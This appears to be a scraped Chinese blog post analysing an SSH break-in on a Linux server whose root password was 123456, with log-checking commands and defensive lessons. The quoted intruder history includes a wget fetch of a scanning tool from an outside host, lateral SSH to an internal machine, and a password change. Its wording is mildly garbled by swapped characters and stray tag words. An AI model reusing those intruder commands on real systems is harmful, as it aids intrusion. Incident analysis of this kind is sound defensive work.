root密码被修改
新装机的Linux服务器替换老服务器,而且接通了外网,以前一直觉得外网SSH的22端口是不通的,都是在内网跳板机SSH登录,因此没太注意密码复杂度,装机时root密码设为123456了。而实际上外网的22端口是开放的。次日发现SSH登录不了,提示密码错误。运维人员进入机房 采用单用户模式进入服务器修改密码,才又能够登录。 
html
拿回密码以后排查被入侵过程以下。git
谁成功登录过?
[root@localhost home]# grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}' #secure文件每周归档加上-归档时间,若是查上周登录将secure改成secure-上周最后一天日期
Jun 08 21:21:26 root 10.1.1.5 #登陆成功的日期、时间、用户名、IP
Jun 08 22:52:48 root 10.1.1.5 【跳板机使用123456登录】
Jun 08 23:24:27 root 10.1.1.5
Jun 09 00:08:29 root 194.165.16.45 【俄罗斯IP,外网使用123456登录】
Jun 09 01:19:39 root 223.112.28.14 【南京IP,外网使用123456登录】
Jun 09 01:20:16 root 92.80.248.158 【罗马尼亚IP,外网使用123456登录】
Jun 09 16:06:38 root 10.1.1.5
Jun 09 16:10:00 root 10.1.1.5 【单用户修改密码后跳板机能够登录】
复制代码
执行grep "Failed password for root" /var/log/secure | awk '{print $11}' 查看看本身的服务器有没有人尝试破解github
入侵者登录后作了什么?
[root@localhost home]#history | more 【去除本身执行的指令,剩下的就是入侵者的指令】
548 w 【查看登录用户】
549 ls
550 free -mt 【查看内存】
551 lscpu
552 cat /proc/cpu info
553 cat /pro/cpcuinfo #查看cpu信息
554 cat /proc/cpuinfo
555 ifconfig
556 ssh 10.1.1.26 【尝试内网其它服务器,若是其它服务器密码简单也会被攻陷】
557 w
558 passwd 【修改root密码】
559 wget nasapaul.com/masscan 【下载端口扫描工具,没成功】
560 wget
561 ls
562 df -h
563 nvidia-smi
564 w
565 ls
566 cat /etc/hosts
567 top
复制代码
入侵者没有过多操做,改了root密码就离开了。不太清楚他会之后再来,仍是到此为止。搜索nasapaul,能够看到一些其它服务器被攻击的信息,网上有个罗马尼亚黑客网名叫paul,高调嚣张,专门入侵服务器,而且不断在内网破解其它服务器的密码,利用服务器算力挖门罗币。结合登录IP有罗马尼亚地址,极可能就是这我的。
他在这台服务器上只修改了密码就离开了,没有部署挖矿程序。服务器
结论
替换以前的老服务器外网端口也是开的,可是多年未被登录,就是由于密码比较复杂。
此事的教训就是运维
- root密码必定要有复杂度,一方面你认为不通外网的服务器未必不通外网。另外一方面,和你同一局域网的机器被控制了,入侵者以它为跳板,你也直接面临来自外网的破解。
- 123456多是最弱的密码,六个1可能都更好。
- 互联网SSH端口必定关闭。
- 修改/etc/ssh/sshd_config里的Port值为22以外的值,能增长破解难度。
最后,创做不易,若是对你们有所帮助,但愿你们点赞支持,有什么问题也能够在评论区里讨论😄~ssh